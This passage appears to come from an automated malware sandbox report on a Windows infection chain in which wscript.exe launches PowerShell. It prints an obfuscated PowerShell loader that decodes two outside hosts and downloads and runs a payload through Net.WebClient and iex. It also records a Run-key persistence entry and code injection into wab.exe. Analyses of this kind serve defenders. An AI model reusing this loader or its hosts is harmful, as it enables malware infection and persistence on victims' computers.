';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

19_2_004044A4

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF886FB3025 pushad ; ret	2_2_00007FF886FB313A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0481EC78 pushfd ; retf	5_2_0481EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07681FB2 push eax; mov dword ptr [esp], ecx	5_2_076821B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F648A4 push ebx; ret	5_2_08F648A5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F62845 push cs; iretd	5_2_08F6284F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F64D9F push ss; ret	5_2_08F64DAC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F63571 push esp; ret	5_2_08F6358B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F63118 push eax; iretd	5_2_08F6311A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F652D2 push cs; ret	5_2_08F65301
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F62AAA push 00000009h; iretd	5_2_08F62AB7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F62291 push edx; retf	5_2_08F6229A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F63E85 push ebp; ret	5_2_08F63EC9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08F60364 pushfd ; retf	5_2_08F60374
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B31219 push esp; iretd	10_2_22B3121A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B22806 push ecx; ret	10_2_22B22819
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A80364 pushfd ; retf	10_2_03A80374
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A82AAA push 00000009h; iretd	10_2_03A82AB7
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A83E85 push ebp; ret	10_2_03A83EC9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A82291 push edx; retf	10_2_03A8229A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A852D2 push cs; ret	10_2_03A85301
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A84D9F push ss; ret	10_2_03A84DAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A83118 push eax; iretd	10_2_03A8311A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A83571 push esp; ret	10_2_03A8358B
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A848A4 push ebx; ret	10_2_03A848A5
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_03A82845 push cs; iretd	10_2_03A8284F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044693D push ecx; ret	19_2_0044694D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044DB70 push eax; ret	19_2_0044DB84
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0044DB70 push eax; ret	19_2_0044DBAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_00451D54 push eax; ret	19_2_00451D61
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044B090 push eax; ret	21_2_0044B0A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_0044B090 push eax; ret	21_2_0044B0CC

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run gstes			Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run gstes			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

21_2_004047CB

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
